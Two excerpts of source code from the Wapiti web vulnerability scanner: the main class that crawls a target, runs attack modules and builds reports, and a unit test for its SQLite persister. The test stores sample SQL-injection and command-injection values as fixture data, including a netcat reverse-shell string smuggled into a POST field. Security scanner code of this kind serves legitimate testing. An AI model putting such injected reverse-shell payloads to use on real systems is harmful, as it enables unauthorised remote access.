Example #1
class Wapiti:
    """This class parse the options from the command line and set the modules and the HTTP engine accordingly.
    Launch wapiti without arguments or with the "-h" option for more informations."""

    REPORT_DIR = "report"
    HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE")
    COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report")

    def __init__(self, root_url, scope="folder"):
        self.target_url = root_url
        self.server = urlparse(root_url).netloc
        self.crawler = crawler.Crawler(root_url)

        self.target_scope = scope
        if scope == "page":
            self.crawler.scope = crawler.Scope.PAGE
        elif scope == "folder":
            self.crawler.scope = crawler.Scope.FOLDER
        elif scope == "domain":
            self.crawler.scope = crawler.Scope.DOMAIN
        else:
            self.crawler.scope = crawler.Scope.URL

        self.report_gen = None
        self.report_generator_type = "html"
        self.xml_rep_gen_parser = ReportGeneratorsXMLParser()
        self.xml_rep_gen_parser.parse(
            os.path.join(CONF_DIR, "config", "reports", "generators.xml"))
        self.output_file = ""

        self.urls = []
        self.forms = []
        self.attacks = []

        self.color = 0
        self.verbose = 0
        self.module_options = None
        self.attack_options = {}
        self._start_urls = deque([self.target_url])
        self._excluded_urls = []
        self._bad_params = set()
        self._max_depth = 40
        self._max_links_per_page = -1
        self._max_files_per_dir = 0
        self._scan_force = "normal"
        self._max_scan_time = 0
        history_file = os.path.join(
            SqlitePersister.CRAWLER_DATA_DIR, "{}_{}_{}.db".format(
                self.server.replace(':', '_'), self.target_scope,
                md5(root_url.encode(errors="replace")).hexdigest()[:8]))
        self._bug_report = True

        self.persister = SqlitePersister(history_file)

    def __init_report(self):
        for rep_gen_info in self.xml_rep_gen_parser.get_report_generators():
            if self.report_generator_type.lower() == rep_gen_info.get_key():
                self.report_gen = rep_gen_info.create_instance()

                self.report_gen.set_report_info(self.target_url,
                                                self.target_scope, gmtime(),
                                                WAPITI_VERSION)
                break

        vuln_xml_parser = VulnerabilityXMLParser()
        vuln_xml_parser.parse(
            os.path.join(CONF_DIR, "config", "vulnerabilities",
                         "vulnerabilities.xml"))
        for vul in vuln_xml_parser.get_vulnerabilities():
            self.report_gen.add_vulnerability_type(_(vul.get_name()),
                                                   _(vul.get_description()),
                                                   _(vul.get_solution()),
                                                   vul.get_references())

        anom_xml_parser = AnomalyXMLParser()
        anom_xml_parser.parse(
            os.path.join(CONF_DIR, "config", "vulnerabilities",
                         "anomalies.xml"))
        for anomaly in anom_xml_parser.get_anomalies():
            self.report_gen.add_anomaly_type(_(anomaly.get_name()),
                                             _(anomaly.get_description()),
                                             _(anomaly.get_solution()),
                                             anomaly.get_references())

    def __init_attacks(self):
        self.__init_report()

        logger = ConsoleLogger()
        if self.color:
            logger.color = True

        print(_("[*] Loading modules:"))
        print("\t {0}".format(", ".join(attack.modules)))
        for mod_name in attack.modules:
            mod = import_module("wapitiCore.attack." + mod_name)
            mod_instance = getattr(mod, mod_name)(self.crawler, self.persister,
                                                  logger, self.attack_options)
            if hasattr(mod_instance, "set_timeout"):
                mod_instance.set_timeout(self.crawler.timeout)
            self.attacks.append(mod_instance)

        self.attacks.sort(key=attrgetter("PRIORITY"))

        for attack_module in self.attacks:
            attack_module.set_verbose(self.verbose)
            if self.color == 1:
                attack_module.set_color()

        # Custom list of modules was specified
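        # Each entry has the form [+|-]module_name[:get|:post]; a leading "-"
        # deactivates the module (or only one of its HTTP methods) while
        # "common" refers to the default set of modules.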
        if self.module_options is not None:
            # First deactivate all modules
            for attack_module in self.attacks:
                attack_module.do_get = False
                attack_module.do_post = False

            opts = self.module_options.split(",")

            for opt in opts:
                if opt.strip() == "":
                    continue

                method = ""
                if opt.find(":") > 0:
                    module_name, method = opt.split(":", 1)
                else:
                    module_name = opt

                # deactivate some module options
                if module_name.startswith("-"):
                    module_name = module_name[1:]
                    if module_name == "all":
                        for attack_module in self.attacks:
                            if attack_module.name in attack.commons:
                                if method == "get" or method == "":
                                    attack_module.do_get = False
                                if method == "post" or method == "":
                                    attack_module.do_post = False
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.do_get = False
                                if method == "post" or method == "":
                                    attack_module.do_post = False
                        if not found:
                            print(
                                _("[!] Unable to find a module named {0}").
                                format(module_name))

                # activate some module options
                else:
                    if module_name.startswith("+"):
                        module_name = module_name[1:]
                    if module_name == "all":
                        print(
                            _("[!] Keyword 'all' was removed for activation. Use 'common' and modules names instead."
                              ))
                    elif module_name == "common":
                        for attack_module in self.attacks:
                            if attack_module.name in attack.commons:
                                if method == "get" or method == "":
                                    attack_module.do_get = True
                                if method == "post" or method == "":
                                    attack_module.do_post = True
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.do_get = True
                                if method == "post" or method == "":
                                    attack_module.do_post = True
                        if not found:
                            print(
                                _("[!] Unable to find a module named {0}").
                                format(module_name))

    def browse(self):
        """Extract hyperlinks and forms from the webpages found on the website"""
        for resource in self.persister.get_to_browse():
            self._start_urls.append(resource)
        for resource in self.persister.get_links():
            self._excluded_urls.append(resource)
        for resource in self.persister.get_forms():
            self._excluded_urls.append(resource)

        stopped = False

        explorer = crawler.Explorer(self.crawler)
        explorer.max_depth = self._max_depth
        explorer.max_files_per_dir = self._max_files_per_dir
        explorer.max_requests_per_depth = self._max_links_per_page
        explorer.forbidden_parameters = self._bad_params
        explorer.qs_limit = SCAN_FORCE_VALUES[self._scan_force]
        explorer.verbose = (self.verbose > 0)
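        # The explorer state is pickled next to the SQLite history file (".db" becomes ".pkl")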
        explorer.load_saved_state(self.persister.output_file[:-2] + "pkl")

        self.persister.set_root_url(self.target_url)
        start = datetime.utcnow()

        try:
            for resource in explorer.explore(self._start_urls,
                                             self._excluded_urls):
                # Browsed URLs are saved one at a time
                self.persister.add_request(resource)
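                # Stop only if a maximum scan time (at least 1 second) was set and has been exceeded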
                if (datetime.utcnow() -
                        start).total_seconds() > self._max_scan_time >= 1:
                    print(_("Max scan time was reached, stopping."))
                    break
        except KeyboardInterrupt:
            stopped = True

        print(_("[*] Saving scan state, please wait..."))

        # URLs that have not been scanned yet are saved all at once (bulk insert + final commit)
        self.persister.set_to_browse(self._start_urls)
        # Let's save explorer values (limits)
        explorer.save_state(self.persister.output_file[:-2] + "pkl")

        print('')
        print(_(" Note"))
        print("========")

        print(
            _("This scan has been saved in the file {0}").format(
                self.persister.output_file))
        if stopped:
            print(
                _("The scan will be resumed next time unless you pass the --skip-crawl option."
                  ))

    def attack(self):
        """Launch the attacks based on the preferences set by the command line"""
        self.__init_attacks()

        for attack_module in self.attacks:
            if attack_module.do_get is False and attack_module.do_post is False:
                continue

            print('')
            if attack_module.require:
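                # Only run the module if every dependency listed in "require" is itself active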
                t = [
                    y.name for y in self.attacks
                    if y.name in attack_module.require and (
                        y.do_get or y.do_post)
                ]
                if attack_module.require != t:
                    print(
                        _("[!] Missing dependencies for module {0}:").format(
                            attack_module.name))
                    print("  {0}".format(",".join(
                        [y for y in attack_module.require if y not in t])))
                    continue
                else:
                    attack_module.load_require([
                        y for y in self.attacks
                        if y.name in attack_module.require
                    ])

            attack_module.log_green(_("[*] Launching module {0}"),
                                    attack_module.name)

            already_attacked = self.persister.count_attacked(
                attack_module.name)
            if already_attacked:
                attack_module.log_green(
                    _("[*] {0} pages were previously attacked and will be skipped"
                      ), already_attacked)

            generator = attack_module.attack()

            answer = "0"
            skipped = 0
            while True:
                try:
                    original_request_or_exception = next(generator)
                    if isinstance(original_request_or_exception,
                                  BaseException):
                        raise original_request_or_exception
                except KeyboardInterrupt as exception:
                    print('')
                    print(_("Attack process was interrupted. Do you want to:"))
                    print(
                        _("\t1) stop everything here and generate the report"))
                    print(_("\t2) move to the next attack module (if any)"))
                    print(
                        _("\t3) stop everything here without generating the report"
                          ))
                    print(_("\t4) continue the current attack"))

                    while True:
                        answer = input("? ").strip()
                        if answer not in ("1", "2", "3", "4"):
                            print(
                                _("Invalid choice. Valid choices are 1, 2, 3 and 4."
                                  ))
                        else:
                            break

                    if answer in ("1", "2"):
                        break
                    elif answer == "4":
                        continue
                    else:
                        # if answer is 3, raise KeyboardInterrupt and it will stop cleanly
                        raise exception
                except (ConnectionError, Timeout):
                    sleep(.5)
                    skipped += 1
                    continue
                except StopIteration:
                    break
                except Exception as exception:
                    # Catch any other exception and print it
                    tb = sys.exc_info()[2]
                    print(exception.__class__.__name__, exception)
                    print_tb(tb)

                    if self._bug_report:
                        traceback_file = str(uuid1())
                        with open(traceback_file, "w") as fd:
                            print_tb(tb, file=fd)
                            print("{}: {}".format(exception.__class__.__name__,
                                                  exception),
                                  file=fd)
                            print("Occurred in {} on {}".format(
                                attack_module.name, self.target_url),
                                  file=fd)
                            print("{}. Requests {}. OS {}".format(
                                WAPITI_VERSION, requests.__version__,
                                sys.platform))

                        try:
                            upload_request = Request(
                                "https://wapiti3.ovh/upload.php",
                                file_params=[[
                                    "crash_report",
                                    [
                                        traceback_file,
                                        open(traceback_file, "rb").read()
                                    ]
                                ]])
                            page = self.crawler.send(upload_request)
                            print(
                                _("Sending crash report {} ... {}").format(
                                    traceback_file, page.content))
                        except RequestException:
                            print(_("Error sending crash report"))
                        os.unlink(traceback_file)
                else:
                    if original_request_or_exception and original_request_or_exception.path_id is not None:
                        self.persister.set_attacked(
                            original_request_or_exception.path_id,
                            attack_module.name)

            if skipped:
                print(
                    _("{} requests were skipped due to network issues").format(
                        skipped))

            if answer == "1":
                break

        # if self.crawler.get_uploads():
        #     print('')
        #     print(_("Upload scripts found:"))
        #     print("----------------------")
        #     for upload_form in self.crawler.get_uploads():
        #         print(upload_form)
        if not self.output_file:
            if self.report_generator_type == "html":
                self.output_file = self.COPY_REPORT_DIR
            else:
                filename = "{}_{}".format(
                    self.server.replace(":", "_"),
                    strftime("%m%d%Y_%H%M", self.report_gen.scan_date))
                if self.report_generator_type == "txt":
                    extension = ".txt"
                elif self.report_generator_type == "json":
                    extension = ".json"
                else:
                    extension = ".xml"
                self.output_file = filename + extension

        for payload in self.persister.get_payloads():
            if payload.type == "vulnerability":
                self.report_gen.add_vulnerability(category=payload.category,
                                                  level=payload.level,
                                                  request=payload.evil_request,
                                                  parameter=payload.parameter,
                                                  info=payload.info)
            elif payload.type == "anomaly":
                self.report_gen.add_anomaly(category=payload.category,
                                            level=payload.level,
                                            request=payload.evil_request,
                                            parameter=payload.parameter,
                                            info=payload.info)

        self.report_gen.generate_report(self.output_file)
        print('')
        print(_("Report"))
        print("------")
        print(
            _("A report has been generated in the file {0}").format(
                self.output_file))
        if self.report_generator_type == "html":
            print(
                _("Open {0} with a browser to see this report.").format(
                    self.report_gen.final_path))
        # if self.http_engine.sslErrorOccured:
        #     print('')
        #     print(_("Warning: Wapiti came across some SSL errors during the scan, it maybe missed some webpages."))

    def set_timeout(self, timeout: float = 6.0):
        """Set the timeout for the time waiting for a HTTP response"""
        self.crawler.timeout = timeout

    def set_verify_ssl(self, verify: bool = False):
        """Set whether SSL must be verified."""
        self.crawler.secure = verify

    def set_proxy(self, proxy: str = ""):
        """Set a proxy to use for HTTP requests."""
        self.crawler.set_proxy(proxy)

    def add_start_url(self, url: str):
        """Specify an URL to start the scan with. Can be called several times."""
        self._start_urls.append(url)

    def add_excluded_url(self, url_or_pattern: str):
        """Specify an URL to exclude from the scan. Can be called several times."""
        self._excluded_urls.append(url_or_pattern)

    def set_cookie_file(self, cookie: str):
        """Load session data from a cookie file"""
        if os.path.isfile(cookie):
            jc = jsoncookie.JsonCookie()
            jc.open(cookie)
            cookiejar = jc.cookiejar(self.server)
            jc.close()
            self.crawler.session_cookies = cookiejar

    def set_auth_credentials(self, auth_basic: tuple):
        """Set credentials to use if the website require an authentication."""
        self.crawler.credentials = auth_basic

    def set_auth_type(self, auth_method: str):
        """Set the authentication method to use."""
        self.crawler.auth_method = auth_method

    def add_bad_param(self, param_name: str):
        """Exclude a parameter from an url (urls with this parameter will be
        modified. This function can be call several times"""
        self._bad_params.add(param_name)

    def set_max_depth(self, limit: int):
        """Set how deep the scanner should explore the website"""
        self._max_depth = limit

    def set_max_links_per_page(self, limit: int):
        self._max_links_per_page = limit

    def set_max_files_per_dir(self, limit: int):
        self._max_files_per_dir = limit

    def set_scan_force(self, force: str):
        self._scan_force = force

    def set_max_scan_time(self, minutes: float):
        self._max_scan_time = minutes * 60

    def set_color(self):
        """Put colors in the console output (terminal must support colors)"""
        self.color = 1

    def verbosity(self, vb: int):
        """Define the level of verbosity of the output."""
        self.verbose = vb

    def set_bug_reporting(self, value: bool):
        self._bug_report = value

    def set_attack_options(self, options: dict = None):
        self.attack_options = options if isinstance(options, dict) else {}

    def set_modules(self, options=""):
        """Activate or deactivate (default) all attacks"""
        self.module_options = options

    def set_report_generator_type(self, report_type="xml"):
        """Set the format of the generated report. Can be xml, html of txt"""
        self.report_generator_type = report_type

    def set_output_file(self, output_file: str):
        """Set the filename where the report will be written"""
        self.output_file = output_file

    def add_custom_header(self, key: str, value: str):
        self.crawler.add_custom_header(key, value)

    def flush_attacks(self):
        self.persister.flush_attacks()

    def flush_session(self):
        self.persister.flush_session()
        try:
            os.unlink(self.persister.output_file[:-2] + "pkl")
        except FileNotFoundError:
            pass

    def count_resources(self) -> int:
        return self.persister.count_paths()

    def has_scan_started(self) -> bool:
        return self.persister.has_scan_started()

    def have_attacks_started(self) -> bool:
        return self.persister.have_attacks_started()
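

# --- Minimal usage sketch (illustrative only, not part of the original class) ---
# It assumes the Wapiti class above is importable with its dependencies; the
# target URL, module names, report format and output file are placeholders.
if __name__ == "__main__":
    scan = Wapiti("http://example.com/", scope="folder")
    scan.set_timeout(10.0)
    scan.set_max_scan_time(30)                  # minutes
    scan.set_modules("common,-exec")            # enable the common modules, disable one
    scan.set_report_generator_type("json")
    scan.set_output_file("example_report.json")

    scan.browse()   # crawl the target and persist the discovered resources
    scan.attack()   # run the selected attack modules and generate the report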
Example #2
async def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!"))

    crawler = AsyncCrawler("http://httpbin.org/")

    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")

    simple_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", "d"]]
    )
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If some requests are stored, it means the scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            await crawler.async_send(req)
            # Add the sent request
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links())) == 1
    # We still have two entries in paths though as the resource just got updated
    assert persister.count_paths() == 2

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass")
    assert next(persister.get_payloads())
    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))
    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    persister.close()
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"
    await crawler.close()